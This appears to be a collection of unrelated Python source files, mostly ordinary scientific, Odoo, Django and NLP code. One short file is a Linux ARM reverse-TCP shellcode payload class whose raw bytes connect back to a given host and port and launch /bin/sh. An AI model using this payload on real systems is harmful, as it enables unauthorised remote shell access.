ref = m.get_value_ptr(var_name)
print(ref)
m.update()
print(' - values (by ref, streamwise) at time {}:'.format(m.get_current_time()))
print(ref)
# Get the grid_id for the plate_surface__thermal_diffusivity variable.
var_name = 'plate_surface__thermal_diffusivity'
print('Variable {}'.format(var_name))
grid_id = m.get_var_grid(var_name)
print(' - grid id:', grid_id)
# Get grid and variable info for plate_surface__thermal_diffusivity.
print(' - grid type:', m.get_grid_type(grid_id))
grid_rank = m.get_grid_rank(grid_id)
print(' - rank:', grid_rank)
print(' - size:', m.get_grid_size(grid_id))
grid_x = np.empty(max(grid_rank, 1), dtype=np.float64)
m.get_grid_x(grid_id, grid_x)
print(' - x:', grid_x)
grid_y = np.empty(max(grid_rank, 1), dtype=np.float64)
m.get_grid_y(grid_id, grid_y)
print(' - y:', grid_y)
grid_z = np.empty(max(grid_rank, 1), dtype=np.float64)
m.get_grid_z(grid_id, grid_z)
print(' - z:', grid_z)
grid_connectivity = np.empty(max(grid_rank, 1), dtype=np.int32)
m.get_grid_connectivity(grid_id, grid_connectivity)
print(' - connectivity:', grid_connectivity)
grid_offset = np.empty(max(grid_rank, 1), dtype=np.int32)
m.get_grid_offset(grid_id, grid_offset)
print(' - offset:', grid_offset)
print(' - variable type:', m.get_var_type(var_name))
print(' - units:', m.get_var_units(var_name))
print(' - itemsize:', m.get_var_itemsize(var_name))
print(' - nbytes:', m.get_var_nbytes(var_name))
# Get the diffusivity values.
val = np.empty(1, dtype=np.float32)
m.get_value(var_name, val)
print(' - values:')
print(val)
# Get the grid_id for the model__identification_number variable.
var_name = 'model__identification_number'
print('Variable {}'.format(var_name))
grid_id = m.get_var_grid(var_name)
print(' - grid id:', grid_id)
# Get grid and variable info for model__identification_number.
print(' - grid type:', m.get_grid_type(grid_id))
grid_rank = m.get_grid_rank(grid_id)
print(' - rank:', grid_rank)
print(' - size:', m.get_grid_size(grid_id))
grid_x = np.empty(max(grid_rank, 1), dtype=np.float64)
m.get_grid_x(grid_id, grid_x)
print(' - x:', grid_x)
grid_y = np.empty(max(grid_rank, 1), dtype=np.float64)
m.get_grid_y(grid_id, grid_y)
print(' - y:', grid_y)
grid_z = np.empty(max(grid_rank, 1), dtype=np.float64)
m.get_grid_z(grid_id, grid_z)
print(' - z:', grid_z)
grid_connectivity = np.empty(max(grid_rank, 1), dtype=np.int32)
m.get_grid_connectivity(grid_id, grid_connectivity)
print(' - connectivity:', grid_connectivity)
grid_offset = np.empty(max(grid_rank, 1), dtype=np.int32)
m.get_grid_offset(grid_id, grid_offset)
print(' - offset:', grid_offset)
print(' - variable type:', m.get_var_type(var_name))
print(' - units:', m.get_var_units(var_name))
print(' - itemsize:', m.get_var_itemsize(var_name))
print(' - nbytes:', m.get_var_nbytes(var_name))
# Get the model id.
val = np.empty(1, dtype=np.int32)
m.get_value(var_name, val)
print(' - values:')
print(val)
# Set new model id.
new = np.array(42, dtype=np.intc)
m.set_value(var_name, new)
check = np.empty(1, dtype=np.int32)
m.get_value(var_name, check)
print(' - new values (set/get):')
print(check)
# Finalize the model.
m.finalize()
# Check that number of instances can't exceed N_MODELS=3.
# a = Heat()
# b = Heat()
# c = Heat() # should fail with index=-1
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
File: model_defs.py
Author: naught101
Email: [email protected]
Github: https://github.com/naught101/empirical_lsm
Description: Models created programmatically
"""
from collections import OrderedDict
import re
from sklearn.linear_model import LinearRegression
from sklearn.cluster import MiniBatchKMeans
from sklearn.neural_network import MLPRegressor
from sklearn.preprocessing import StandardScaler
from sklearn.pipeline import make_pipeline
from empirical_lsm.clusterregression import ModelByCluster
from empirical_lsm.transforms import MissingDataWrapper, LagAverageWrapper, MarkovLagAverageWrapper, Mean
def km_regression(k, model):
return MissingDataWrapper(ModelByCluster(MiniBatchKMeans(k), model))
def km_lin(k):
return km_regression(k, LinearRegression())
def cur_3_var():
var_lags = OrderedDict()
[var_lags.update({v: ['cur']}) for v in ['SWdown', 'Tair', 'RelHum']]
return var_lags
def MLP(*args, **kwargs):
"""Multilayer perceptron """
return MissingDataWrapper(make_pipeline(StandardScaler(), MLPRegressor(*args, **kwargs)))
def get_var_name(v):
fvars = {"S": "SWdown",
"T": "Tair",
"H": "RelHum",
"W": "Wind",
"R": "Rainf",
"L": "LWdown",
"Q": "Qair"}
return fvars[v]
def add_var_lag(var_dict, v, lag='cur'):
if v not in var_dict:
var_dict.update({v: [lag]})
else:
var_dict[v] += [lag]
def parse_model_name(name):
"""parses a standard model name"
"""
name_original = name
var_lags = OrderedDict()
while len(name) > 0:
token = name[0]
name = name[1:]
if token in 'STHWRLQ':
add_var_lag(var_lags, get_var_name(token))
continue
if token == 'd':
v = name[0]
add_var_lag(var_lags, 'delta' + v)
name = name[1:]
continue
elif token == '_':
if name.startswith('lin'): # linear model
model_name = 'lin'
name = name[3:]
continue
elif name.startswith('l'): # lagged var:
match = re.match('l([A-Z])([0-9]*[a-z]*)(M*)', name)
groups = match.groups()
add_var_lag(var_lags, get_var_name(groups[0]), groups[1] + groups[2])
name = name[len(match.group()):]
continue
elif name.startswith('km'): # k means regression
model_name = 'km'
match = re.match('km([0-9]*)', name)
k = int(match.groups()[0])
name = name[len(match.group()):]
continue
elif name.startswith('mean'): # Cluster-mean
model_name = 'mean'
name = name[4:]
continue
elif name.startswith('RF'):
model_name = 'randomforest'
name = name[2:]
continue
elif name.startswith('ET'):
model_name = 'extratrees'
name = name[2:]
continue
elif name.startswith('AB'):
model_name = 'adaboost'
name = name[2:]
continue
elif token == '.': # model duplicate - do nothing
name = name.lstrip('.0123456789')
continue
raise NameError('Unmatched token in name: ' + name)
if model_name == 'lin':
model = MissingDataWrapper(LinearRegression())
desc = 'lin'
elif model_name == 'mean':
model = MissingDataWrapper(Mean())
desc = 'mean'
elif model_name == 'km':
model = km_regression(k, LinearRegression())
desc = 'km' + str(k)
elif model_name == 'randomforest':
from sklearn.ensemble import RandomForestRegressor
model = MissingDataWrapper(RandomForestRegressor(n_estimators=100))
desc = 'RandomForest'
memory_req = 20e9
elif model_name == 'extratrees':
from sklearn.ensemble import ExtraTreesRegressor
model = MissingDataWrapper(ExtraTreesRegressor(n_estimators=100))
desc = 'ExtraTrees'
memory_req = 30e9
elif model_name == 'adaboost':
from sklearn.ensemble import AdaBoostRegressor
model = MissingDataWrapper(AdaBoostRegressor(n_estimators=100))
desc = 'AdaBoost'
memory_req = 20e9
desc = desc + " model with"
if any([l != ['cur'] for l in var_lags.values()]):
model = LagAverageWrapper(var_lags, model)
model.forcing_vars = list(var_lags)
cur_vars = []
lag_vars = []
for k, v in var_lags.items():
if 'cur' in v:
cur_vars += [k]
if len(v) > 0:
for l in v:
                if l != 'cur':
lag_vars += ['Lagged ' + k + ' (' + l + ')']
desc += ' with ' + ', '.join(cur_vars)
if len(lag_vars) > 0:
desc += ', ' + ', '.join(lag_vars)
desc += ' (parsed)'
model.description = desc
model.name = name_original
if 'memory_req' in locals():
model.memory_requirement = memory_req
return model
def get_model_from_def(name):
"""returns a scikit-learn style model/pipeline
:name: model name
:returns: scikit-learn style mode/pipeline
"""
# PLUMBER-style benchmarks
if name == '1lin':
model = MissingDataWrapper(LinearRegression())
model.forcing_vars = ['SWdown']
model.description = "PLUMBER-style 1lin (SWdown only)"
elif name == '3km27':
model = km_lin(27)
model.forcing_vars = ['SWdown', 'Tair', 'RelHum']
model.description = "PLUMBER-style 3km27 (SWdown, Tair, RelHum)"
# higher non-linearity
elif name == '3km243':
model = km_lin(243)
model.forcing_vars = ['SWdown', 'Tair', 'RelHum']
model.description = "Like 3km27, but with more clusters"
# All lagged-inputs
elif name == '3km27_lag':
model_dict = {
'variable': ['SWdown', 'Tair', 'RelHum'],
'clusterregression': {
'class': MiniBatchKMeans,
'args': {
'n_clusters': 27}
},
'class': LinearRegression,
'lag': {
'periods': 1,
'freq': 'D'}
}
from .models import get_model_from_dict
model = MissingDataWrapper(get_model_from_dict(model_dict))
model.forcing_vars = ['SWdown', 'Tair', 'RelHum']
model.description = "like 3km27, but includes 1-day lagged versions of all three variables"
# Many variables, lags. Doesn't work very well... (not enough non-linearity?)
elif name == '5km27_lag':
var_lags = OrderedDict()
[var_lags.update({v: ['cur', '2d', '7d']}) for v in ['SWdown', 'Tair', 'RelHum', 'Wind']]
var_lags.update({'Rainf': ['cur', '2d', '7d', '30d', '90d']})
model = LagAverageWrapper(var_lags, km_lin(27))
model.forcing_vars = list(var_lags)
model.description = "km27 linear regression with SW, T, RH, Wind, Rain, and 2 and 7 day lagged-averages for each, plus 30- and 90-day lagged averages for Rainf (probably needs more clusters...)"
# 3km243 with lagged Rainf
elif name == 'STH_lR2d30d_km243':
var_lags = cur_3_var()
var_lags.update({'Rainf': ['2d', '30d']})
model = LagAverageWrapper(var_lags, km_lin(243))
model.forcing_vars = list(var_lags)
model.description = "km243 Linear model with Swdown, Tair, RelHum, and Lagged Rainf (2d,30d)"
# 3km243 with lagged Wind
elif name == 'STH_lW2d30d_km243':
var_lags = cur_3_var()
var_lags.update({'Wind': ['2d', '30d']})
model = LagAverageWrapper(var_lags, km_lin(243))
model.forcing_vars = list(var_lags)
model.description = "km243 Linear model with Swdown, Tair, RelHum, and Lagged Wind (2d,30d)"
# Lagged and non-lagged rainfall
elif name == 'STHR_lR_km243':
var_lags = cur_3_var()
var_lags.update({'Rainf': ['cur', '2d']})
model = LagAverageWrapper(var_lags, km_lin(243))
model.forcing_vars = list(var_lags)
model.description = "km243 Linear model with Swdown, Tair, RelHum, Rainf, and Lagged Rainf (2d)"
# Markov-lagged Qle variants (doesn't seem to be working very well)
elif name == 'STH_lQle30min_km243':
var_lags = cur_3_var()
var_lags.update({'Qle': ['30min']})
model = MarkovLagAverageWrapper(var_lags, km_lin(243))
model.forcing_vars = list(['SWdown', 'Tair', 'RelHum'])
model.description = "km243 Linear model with Swdown, Tair, RelHum, and Markov-Lagged Qle (30min)"
elif name == 'STH_lQle1h_km243':
var_lags = cur_3_var()
var_lags.update({'Qle': ['1h']})
model = MarkovLagAverageWrapper(var_lags, km_lin(243))
model.forcing_vars = list(['SWdown', 'Tair', 'RelHum'])
model.description = "km243 Linear model with Swdown, Tair, RelHum, and Markov-Lagged Qle (1h)"
elif name == 'STH_lQle2d_km243':
var_lags = cur_3_var()
var_lags.update({'Qle': ['2d']})
model = MarkovLagAverageWrapper(var_lags, km_lin(243))
model.forcing_vars = list(['SWdown', 'Tair', 'RelHum'])
model.description = "km243 Linear model with Swdown, Tair, RelHum, and Markov-Lagged Qle (2d)"
# Neural network models
elif name == 'STH_MLP':
var_lags = cur_3_var()
model = LagAverageWrapper(var_lags, MLP((15, 10, 5, 10)))
model.forcing_vars = list(var_lags)
model.description = "Neural-network model with Swdown, Tair, RelHum"
elif name == 'STH_MLP_lR2d':
var_lags = cur_3_var()
var_lags.update({'Rainf': ['2d']})
model = LagAverageWrapper(var_lags, MLP((15, 10, 5, 10)))
model.forcing_vars = list(var_lags)
model.description = "Neural-network model with Swdown, Tair, RelHum, and Lagged Rainf (2d)"
# Named parseable models
elif name == 'short_term243':
model = parse_model_name('STHWdTdQ_lT6hM_km243')
        model.name = 'short_term243'
elif name == 'long_term243':
model = parse_model_name('STHWdTdQ_lS30d_lR30d_lH10d_lT6hM_km243')
        model.name = 'long_term243'
elif name == 'long_term729':
model = parse_model_name('STHWdTdQ_lS30d_lR30d_lH10d_lT6hM_km729')
        model.name = 'long_term729'
else:
raise NameError("unknown model")
return model
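# A minimal, hedged usage sketch of the name parser above (assumes the
# empirical_lsm wrappers imported at the top are importable):
if __name__ == '__main__':
    demo = parse_model_name('STH_km27')
    print(demo.name, '->', demo.description)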
|
from lib.payloads.shellcode import Shellcode
class Payload(Shellcode):
Shellcode.info["author"] = "midnitesnake"
Shellcode.info["name"] = "LinuxARM - reverse_tcp shellcode"
Shellcode.info["references"] = [
"http://shell-storm.org/shellcode/files/shellcode-821.php",
]
def __init__(self, **kwargs):
Shellcode.info["payload"] = [
r"\x01\x10\x8F\xE2\x11\xFF\x2F\xE1"
r"\x02\x20\x01\x21\x92\x1a\x0f\x02"
r"\x19\x37\x01\xdf\x06\x1c\x08\xa1"
r"\x10\x22\x02\x37\x01\xdf\x3f\x27"
r"\x02\x21\x30\x1c\x01\xdf\x01\x39\xfb\xd5"
r"\x05\xa0\x92\x1a\x05\xb4\x69\x46"
r"\x0b\x27\x01\xdf\xc0\x46\x02\x00"
+ kwargs["lport"] +
r"\x13\x37"
+ kwargs["host"] +
r"\x2f\x62\x69\x6e\x2f\x73\x68"
]
|
#!/usr/bin/env python
# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2011,2013 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Populate location link table with locations links and hop distance.
"""
import os
import sys
BINDIR = os.path.dirname(os.path.realpath(sys.argv[0]))
sys.path.append(os.path.join(BINDIR, "..", "..", "lib", "python2.6"))
import aquilon.aqdb.depends
from aquilon.config import Config
from aquilon.aqdb.model import Base
from aquilon.aqdb.db_factory import DbFactory
db = DbFactory()
LINK_INS = "insert into location_link (child_id,parent_id,distance) values (:cid,:pid,:dist) "
SELECT = """select id,name,parent_id,location_type from location """
Base.metadata.bind = db.engine
session = db.Session()
def get_dict():
""" build a hash of location data keyed on id"""
result = db.engine.execute(SELECT)
ldict = {}
for item in result:
ldict[item[0]] = {'name':item[1], 'pid':item[2], 'type':item[3]}
return ldict
def main():
""" build location links from each location traversing
thru the parent """
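    # For example, a chain rack -> room -> building yields the rows
    # (rack, room, 1) and (rack, building, 2); processing the room then
    # adds (room, building, 1).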
ldict = get_dict()
for curr_id in ldict.keys():
child_id = curr_id
child = ldict[curr_id]
print "Processing ", child_id, child
parent_id = child['pid']
dist = 0
while parent_id is not None:
            dist = dist + 1
parent = ldict[parent_id]
print ("Adding child [%s/%s = %d], parent [%s/%s =%d], dist=%d"
% (child['type'], child['name'], child_id, parent['type'],
parent['name'], parent_id, dist))
db.engine.execute(LINK_INS, {'cid' : child_id, 'pid' : parent_id, 'dist' : dist})
parent_id = parent['pid']
session.commit()
if __name__ == '__main__':
main()
|
# Copyright 2016 LasLabs Inc.
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).
from odoo.tests import common
@common.at_install(False)
@common.post_install(True)
class TestResUsers(common.TransactionCase):
def setUp(self):
super(TestResUsers, self).setUp()
self.user_vals = {'name': 'Test',
'login': 'login',
}
def new_record(self):
return self.env['res.users'].create(self.user_vals)
def test_available_action_types_excludes_user_default(self):
""" It should not contain `user_default` in avail actions """
self.user_vals['printing_action'] = 'user_default'
with self.assertRaises(ValueError):
self.new_record()
def test_available_action_types_includes_something_else(self):
""" It should still contain other valid keys """
self.user_vals['printing_action'] = 'server'
self.assertTrue(self.new_record())
def test_onchange_printer_tray_id_empty(self):
user = self.env['res.users'].new(
{'printer_tray_id': False})
user.onchange_printing_printer_id()
self.assertFalse(user.printer_tray_id)
def test_onchange_printer_tray_id_not_empty(self):
server = self.env['printing.server'].create({})
printer = self.env['printing.printer'].create({
'name': 'Printer',
'server_id': server.id,
'system_name': 'Sys Name',
'default': True,
'status': 'unknown',
'status_message': 'Msg',
'model': 'res.users',
'location': 'Location',
'uri': 'URI',
})
tray = self.env['printing.tray'].create({
'name': 'Tray',
'system_name': 'TrayName',
'printer_id': printer.id,
})
user = self.env['res.users'].new(
{'printer_tray_id': tray.id})
self.assertEqual(user.printer_tray_id, tray)
user.onchange_printing_printer_id()
self.assertFalse(user.printer_tray_id)
|
from datetime import datetime
import iso8601
from ocd_backend.items.popolo import (
PersonItem, OrganisationItem, MembershipItem)
class PopitBaseItem(object):
"""
Base class for importing things from a Popit instance.
"""
ignored_list_fields = {
'memberships': [
# FIXME: start and end dates for memberships borked due to ES configuration (?)
'start_date', 'end_date',
'url', 'html_url', 'contact_details', 'images', 'links'
],
'area': ['id', 'name']
}
def get_object_id(self):
return unicode(self.original_item['id'])
def get_original_object_id(self):
return self.get_object_id()
def get_original_object_urls(self):
try:
return self.original_item['meta']['original_object_urls']
except KeyError as e:
pass
try:
return {'html': self.original_item['html_url']}
except KeyError as e:
pass
return {}
def get_rights(self):
try:
return self.original_item['meta']['rights']
except KeyError as e:
return u'undefined'
def get_collection(self):
return unicode(self.source_definition['index_name'])
def get_combined_index_data(self):
combined_index_data = {
'hidden': self.source_definition['hidden']
}
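        # e.g. with combined_index_fields = {'name': unicode,
        # 'birth_date': datetime} (illustrative values only), the loop below
        # coerces each raw Popit field into the matching Python type.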
for field in self.combined_index_fields:
if field not in self.original_item:
continue
if self.combined_index_fields[field] == unicode:
combined_index_data[field] = unicode(
self.original_item[field])
elif self.combined_index_fields[field] == datetime:
if self.original_item[field] is not None:
try:
combined_index_data[field] = iso8601.parse_date(
self.original_item[field])
except iso8601.ParseError as e:
combined_index_data[field] = None
elif self.combined_index_fields[field] == list:
if field in self.ignored_list_fields:
combined_index_data[field] = [
                        {k: v for k, v in l.iteritems()
                         if k not in self.ignored_list_fields[field]}
                        for l in self.original_item[field]]
else:
combined_index_data[field] = self.original_item[field]
elif self.combined_index_fields[field] == dict:
if field in self.ignored_list_fields:
combined_index_data[field] = {
k: v for k, v in self.original_item[field].iteritems() if k not in self.ignored_list_fields[field]}
else:
combined_index_data[field] = self.original_item[field]
else:
combined_index_data[field] = self.original_item[field]
return combined_index_data
def get_index_data(self):
return {}
def get_all_text(self):
text_items = []
return u' '.join(text_items)
class PopitPersonItem(PopitBaseItem, PersonItem):
"""
Imports persons from a popit instance.
"""
pass
class PopitOrganisationItem(PopitBaseItem, OrganisationItem):
"""
Imports organizations from a popit instance.
"""
pass
class PopitMembershipItem(PopitBaseItem, MembershipItem):
"""
Imports a membership from a popit instance.
"""
pass
|
from django.contrib.sitemaps import Sitemap
from .models import Category, Post
class PostSitemap(Sitemap):
changefreq = "weekly"
priority = 0.8
def items(self):
return Post.published.all()
def lastmod(self, obj):
return obj.created_on
class CategorySitemap(Sitemap):
changefreq = "weekly"
priority = 0.8
def items(self):
return Category.objects.all()
|
from django.conf.urls import *
from django.contrib.auth.decorators import login_required
from scaffold_report import views
from scaffold_report import report
report.autodiscover()
urlpatterns = patterns('',
    url(r'^(?P<name>\w+)/$', login_required(views.ScaffoldReportView.as_view()), name='scaffold-report'),
    url(r'^(?P<name>\w+)/view/$', login_required(views.DownloadReportView.as_view()), name='scaffold-report-download'),
)
|
from src.Types import TokenTypes
class Token():
def __init__(self, token_type: TokenTypes, value):
self.type = token_type
self.value = value
|
"""
Module to download temperature data and compute moving averages.
"""
import numpy as np
import requests
def generate_url(location):
url = f'http://berkeleyearth.lbl.gov/auto/Regional/TAVG/Text/{location}-TAVG-Trend.txt'
return url
def download_data(location):
"""
Downloads average temperature data for `location`. Returns as a np.array.
"""
url = generate_url(location)
response = requests.get(url)
data = np.loadtxt(response.iter_lines(), comments="%")
return data
def moving_average(data, width):
    """Moving average over a 2*width-sample window around each index;
    edge positions without a full window are left as NaN."""
    moving_avg = np.full(data.size, np.nan)
    for i in range(width, moving_avg.size - width):
        moving_avg[i] = np.mean(data[i - width:i + width])
    return moving_avg
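# A minimal, hedged smoke test on synthetic data, so it runs without
# network access (real inputs would come from download_data above):
if __name__ == '__main__':
    fake = np.sin(np.linspace(0, 10, 200))
    print(moving_average(fake, width=5)[5:10])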
|
"""
GLCM:
The gray-level co-occurrence matrix (GLCM) is the distribution of simultaneously
occurring pixel values within a given offset. An offset is the position (distance
and direction) of adjacent pixels. As the name implies, the GLCM is always calculated
for a grayscale image.
"""
from cv2 import (imread, imshow, waitKey, cvtColor, COLOR_BGR2GRAY)
import skimage.feature as sk
import numpy as np
# Reading the image and converting it to grayscale
original_image = imread("images/Bill-Gates.jpg")
grayscale_image = cvtColor(original_image, COLOR_BGR2GRAY)
imshow("Grayscale Image", grayscale_image)
# Calculating GLCM of the grayscale image
glcm = sk.greycomatrix(grayscale_image, [2], [0, np.pi / 2])
print(f"GLCM: {glcm}")
waitKey(0)
|
from Tkinter import *
root = Tk()
def printName(event):
print("Hello my name is Bucky")
button_1 = Button(root, text="Print Message")
# <Button-1> is an event that means "clicked left mouse button"
button_1.bind("<Button-1>", printName) # (event, function)
button_1.pack()
root.mainloop()
|
###################################################################################
#
# Copyright (C) 2017 MuK IT GmbH
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###################################################################################
from odoo import api, fields, models
class ResConfigSettings(models.TransientModel):
_inherit = 'res.config.settings'
    module_muk_web_preview_audio = fields.Boolean(
        string="Preview Audio",
        help="Extends the Preview Dialog to support audio.")
    module_muk_web_preview_csv = fields.Boolean(
        string="Preview CSV",
        help="Extends the Preview Dialog to support CSV files.")
    module_muk_web_preview_image = fields.Boolean(
        string="Preview Image",
        help="Extends the Preview Dialog to support image files.")
    module_muk_web_preview_mail = fields.Boolean(
        string="Preview Mail",
        help="Extends the Preview Dialog to support emails.")
    module_muk_web_preview_markdown = fields.Boolean(
        string="Preview Markdown",
        help="Extends the Preview Dialog to support markdown files.")
    module_muk_web_preview_msoffice = fields.Boolean(
        string="Preview MS Office",
        help="Extends the Preview Dialog to support office files.")
    module_muk_web_preview_rst = fields.Boolean(
        string="Preview ReStructuredText",
        help="Extends the Preview Dialog to support reStructuredText.")
    module_muk_web_preview_text = fields.Boolean(
        string="Preview Text",
        help="Extends the Preview Dialog to support text files.")
    module_muk_web_preview_vector = fields.Boolean(
        string="Preview Vector",
        help="Extends the Preview Dialog to support vector files.")
    module_muk_web_preview_video = fields.Boolean(
        string="Preview Video",
        help="Extends the Preview Dialog to support video files.") |
import os
import stanza
import torch
def stanza_pipeline(
lenguaje,
procesadores="tokenize, pos, lemma, mwt",
modelo_lemas="",
modelo_ner="",
modelo_pos="",
):
"""
Carga y retorna un pipeline, o flujo de trabajo, de Stanza del y \
lenguaje y con los procesos especificados por el usuario. Los \
procesos que el usuario puede elegir añadir al pipeline incluyen \
tokenización, *Part of Speech* (POS), lematización y \
*Named Entity Recognition* (NER), entre otros.
Para mayor información sobre estos modelos y los pipelines se puede \
consultar la página Stanza \
(https://stanfordnlp.github.io/stanza/pipeline.html#processors).
:param lenguaje: (str). Lenguaje para el que se desean cargar los modelos\
de Stanza. Stanza tiene modelos disponibles para varios lenguajes, \
dependiendo de la función a realizar. Para mayor información, visitar \
https://stanfordnlp.github.io/stanza/available_models.html
:param procesadores: (str). Valor por defecto: 'tokenize, pos, lemma'. \
Lista de procesadores, también entendidos como procesos o tareas \
que se desean aplicar a un texto de entrada, que se desean incluir \
en el pipeline. Se ingresa un string en el que los diferentes \
procesadores van separados por comas.
:param modelo_lemas: Ubicación de un \
archivo que contenga el modelo o procesador que el usuario desea \
utilizar para aplicar lematización a los textos. Si este parámetro se \
deja vacío, se utilizará el procesador disponible de la librería \
Stanza para el lenguaje especificado.
:type modelo_lemas: str, opcional
:param modelo_ner: (str). Valor por defecto: ''. Unicación de un archivo \
que contenga el modelo o procesador que el usuario desea utilizar \
para aplicar *Named Entity Recognition* a los textos. Si este \
parámetro se deja vacío, se utilizará el procesador disponible de la \
librería Stanza para el lenguaje especificado.
:param modelo_pos: (str). Valor por defecto: ''. Unicación de un archivo \
que contenga el modelo o procesador que el usuario desea utilizar \
para aplicar *Part of Speech* a los textos. Si este parámetro se deja \
vacío, se utilizará el procesador disponible de la librería Stanza \
para el lenguaje especificado.
:return: (stanza Pipeline). Pipeline de Stanza, del lenguaje especificado,\
con los procesadores determinados por el usuario. Si los modelos \
requeridos no están disponibles en el computador del usuario, la \
función descargará los modelos correspondientes, lo cual puede tardar \
algunos minutos dependiendo del tamaño de los modelos y la velocidad \
de conexión a internet del usuario.
"""
    # Basic pipeline configuration
    config = {
        "processors": procesadores,
        "lang": lenguaje,
    }
    # If any custom model is supplied, add it to the config dict
    if modelo_pos != "":
        config["pos_model_path"] = modelo_pos
    if modelo_lemas != "":
        config["lemma_model_path"] = modelo_lemas
    if modelo_ner != "":
        config["ner_model_path"] = modelo_ner
    # Try to create the pipeline; if the model has not been downloaded
    # yet, download it first
try:
nlp_pipe = stanza.Pipeline(**config, verbose=False)
except BaseException:
        print(
            (
                "[INFO] Downloading model. This process "
                "may take several minutes.\n"
            )
        )
        stanza.download(lenguaje, verbose=True)
        print("\n[INFO] The model has been downloaded.")
nlp_pipe = stanza.Pipeline(**config, verbose=False)
    # Return the pipeline
return nlp_pipe
def modificar_modelo(
nlp_pipe,
tipo,
nuevo_diccionario,
archivo_entrada=None,
archivo_salida=None,
gpu=False,
):
"""
A partir de un diccionario de entrada, modifica un procesador de un \
pipeline existente de Stanza.
:param nlp_pipe: (stanza Pipeline). Pipeline de Stanza que contiene \
el procesador que se desea modificar.
:param tipo: (str) ['lemma', 'pos', 'tokenize']. Tipo de procesador o \
modelo que se desea modificar.
:param nuevo_diccionario: (dict). Diccionario de Python que contiene los \
elementos para añadir o modificar en el modelo que se desea cambiar. \
Las llaves y los valores de este diccionario pueden tener distinta \
información, dependiendo del tipo de modelo que se va a modificar. \
Por ejemplo, para modificar el modelo de lematización (tipo='lemma'), \
las llaves del diccionario serán palabras y los valores del \
diccionario serán los lemas.
:param archivo_entrada: (str). Valor por defecto: ''. Ubicación del \
archivo que contiene el modelo o procesador que se desea modificar. \
Si se deja vacío este parámetro, la modificación se hará sobre el \
modelo que trae por defecto el pipeline de Stanza.
:param archivo_salida: (str). Valor por defecto: ''. Ubicación y nombre \
del archivo en donde se desea guardar el modelo o procesador \
modificado. Si este valor se deja vacío, la función retornará el \
pipeline con el modelo modificado, pero el modelo no será guardado.
:param gpu: (bool). Valor por defecto: False. Parámetro opcional que \
permite al usuario especificar si va a utilizar una GPU para cargar \
y modificar los objetos (modelos) de PyTorch.
:return: (stanza Pipeline). Pipeline de entrada, después de modificar el \
procesador o modelo determinado por el usuario.
"""
    # Determine the model's location
tipo = tipo.lower()
if archivo_entrada is None:
procesador = [
i for i in nlp_pipe.loaded_processors if tipo in str(i).lower()
][0]
archivo_entrada = procesador.config["model_path"]
    # Load the model and its dictionaries
locacion = "gpu" if gpu else "cpu"
modelo = torch.load(archivo_entrada, map_location=locacion)
if "lemma" in tipo:
dict_palabras, dict_compuesto = modelo["dicts"]
        # Add the new words
for key in nuevo_diccionario:
if isinstance(key, tuple):
dict_compuesto[key] = nuevo_diccionario[key]
else:
dict_palabras[key] = nuevo_diccionario[key]
    # TODO: the remaining cases are still to be completed; this will be
    # revisited when POS and NER support is added to the library
else:
pass
# dict_vocab = modelo["vocab"]
# Acá falta seguir el proceso para cada caso
    # Decide where the model will be saved
borrar_modelo = False
if archivo_salida is None:
borrar_modelo = True
archivo_salida = "{}.pt".format(os.getpid())
    # Save the modified model
torch.save(modelo, archivo_salida)
    # Load the modified model (tipo was already lower-cased above)
if tipo == "lemma":
nlp_pipe = stanza_pipeline("es", modelo_lemas=archivo_salida)
elif tipo == "pos":
nlp_pipe = stanza_pipeline("es", modelo_pos=archivo_salida)
elif tipo == "ner":
nlp_pipe = stanza_pipeline("es", modelo_ner=archivo_salida)
    # If no output location was specified for the resulting model, it is
    # deleted
if borrar_modelo:
os.remove(archivo_salida)
    # Return the modified pipeline
return nlp_pipe
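# A minimal, hedged usage sketch (the first run downloads the Spanish
# models, which may take a few minutes):
if __name__ == "__main__":
    nlp = stanza_pipeline("es")
    doc = nlp("Los gatos corren por el parque.")
    for sent in doc.sentences:
        print([(w.text, w.lemma) for w in sent.words])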
|
'''Test-only models.
https://docs.djangoproject.com/en/2.0/topics/testing/advanced/#using-the-django-test-runner-to-test-reusable-applications
'''
from django.db import models
# Models
class SampleParentModel(models.Model):
sample_field = models.CharField(max_length=8)
class Meta:
db_table = 'parent'
class SampleChildModel(models.Model):
sample_field = models.CharField(max_length=8)
class SampleRelatedModel(models.Model):
    parent = models.ForeignKey(SampleParentModel, on_delete=models.CASCADE)
sample_field = models.CharField(max_length=8)
|
"""Poll module is ungraded xmodule used by students to
to do set of polls.
On the client side we show:
If student does not yet anwered - Question with set of choices.
If student have answered - Question with statistics for each answers.
"""
import html
import json
import logging
from collections import OrderedDict
from copy import deepcopy
from pkg_resources import resource_string
from web_fragments.fragment import Fragment
from lxml import etree
from openedx.core.djangolib.markup import Text, HTML
from xblock.fields import Boolean, Dict, List, Scope, String # lint-amnesty, pylint: disable=wrong-import-order
from xmodule.mako_module import MakoTemplateBlockBase
from xmodule.stringify import stringify_children
from xmodule.util.xmodule_django import add_webpack_to_fragment
from xmodule.x_module import (
HTMLSnippet,
ResourceTemplates,
shim_xmodule_js,
XModuleMixin,
XModuleDescriptorToXBlockMixin,
XModuleToXBlockMixin,
)
from xmodule.xml_module import XmlMixin
log = logging.getLogger(__name__)
_ = lambda text: text
class PollBlock(
MakoTemplateBlockBase,
XmlMixin,
XModuleDescriptorToXBlockMixin,
XModuleToXBlockMixin,
HTMLSnippet,
ResourceTemplates,
XModuleMixin,
): # pylint: disable=abstract-method
"""Poll Module"""
# Name of poll to use in links to this poll
display_name = String(
